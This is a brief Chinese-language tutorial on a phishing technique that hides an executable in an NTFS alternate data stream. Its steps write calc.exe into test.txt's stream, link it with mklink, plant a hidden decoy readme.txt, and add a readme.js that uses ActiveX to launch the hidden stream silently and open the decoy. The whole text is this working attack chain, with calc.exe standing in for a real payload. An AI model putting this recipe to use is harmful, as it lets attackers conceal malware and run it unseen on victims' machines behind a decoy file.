使用文件流ADS及JavaScript进行钓鱼攻击, 2.将程序写入文件流(此处用calc.exe) type calc.exe > test.txt:calc.exe 3.使用mklink创建文件链接: mklink config.txt test.txt:calc.exe 4.创建readme.txt,文件内容随便。设置为隐藏。 5.创建readme.js,内容如下: var objShell = new ActiveXObject("shell.application"); objShell.ShellExecute("cmd.exe", "/c config.txt", "", "open", 0); objShell.ShellExecute("README.txt", "", "", "open", 1); 执行readme.js,运行calc.exe ,打开readme.txt (责任编辑:好模板) |